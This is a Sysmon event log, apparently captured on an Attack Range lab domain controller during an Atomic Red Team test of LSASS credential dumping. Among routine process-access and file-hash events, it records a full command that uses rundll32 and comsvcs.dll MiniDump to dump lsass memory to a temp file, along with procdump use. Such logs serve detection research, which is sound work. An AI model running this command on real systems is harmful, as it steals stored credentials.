21:10:21.812{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.812{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.796{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579B55F9AE31E7571085F1B76860A6DF,SHA256=FCEDF25C19B1517CFE97B3D8A9937AA168A5C15F94398D62C85AA4842A5B1651,IMPHASH=00000000000000000000000000000000falsetrue 17141700x800000000000000025600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:21.796{4DB9351A-A33D-60D3-5706-00000000CF01}3604\PSHost.132689562216293942.3604.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.765{4DB9351A-A33D-60D3-5706-00000000CF01}3604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yq4pgqgb.cjv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.765{4DB9351A-A33D-60D3-5706-00000000CF01}3604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wm3c2k0v.woz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.718{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wm3c2k0v.woz.ps12021-06-23 21:10:21.718 10341000x800000000000000025596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.629{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.577{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=DB931BA41E34446C293AAF0939AAA36B,SHA256=BD8A3EFD01ADDDBA44F13E6D1B876E7237D8CDAA52EBE24FA7A909A88D5E69CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.562{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=FD4AC0E77CCFAFC17A561D1A73092948,SHA256=A1F14499078731D17CD49D95275251C0EFA33651F03B5B247CEF9E9ED8BF1200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.531{4DB9351A-A33A-60D3-5506-00000000CF01}3692ATTACKRANGE\AdministratorC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2truetrue 23542300x800000000000000025621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.812{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA93A6F90F1ADC2F70A7060D8CAF74DA,SHA256=42139ACCF80524E911BBCB2DC1637AEDE54E45239AC9D05606020A15499C8696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.781{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C273548CE9E9347F43DF1CECAC551A8F,SHA256=FDD9BAF56DFB72EE9DA39177F642F849079D3277667D25CDF318BA1DA10C3643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.643{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15F52065A1A09A6C88C8BA65A610BB1C,SHA256=A899489CFD841ED9C9F88E97562765C7ED995F48C7DACFE8C8A47475C2D18922,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.187{4DB9351A-A33E-60D3-5806-00000000CF01}57846992C:\Windows\System32\rundll32.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\windows\System32\comsvcs.dll+3a294|C:\Windows\System32\rundll32.exe+3b0c|C:\Windows\System32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000025617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.187{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\lsass-comsvcs.dmp2021-06-23 21:10:22.187 10341000x800000000000000025616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.187{4DB9351A-A33E-60D3-5806-00000000CF01}57846992C:\Windows\System32\rundll32.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\windows\System32\comsvcs.dll+3a17f|C:\Windows\System32\rundll32.exe+3b0c|C:\Windows\System32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.171{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.171{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.077{4DB9351A-A33D-60D3-5706-00000000CF01}3604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 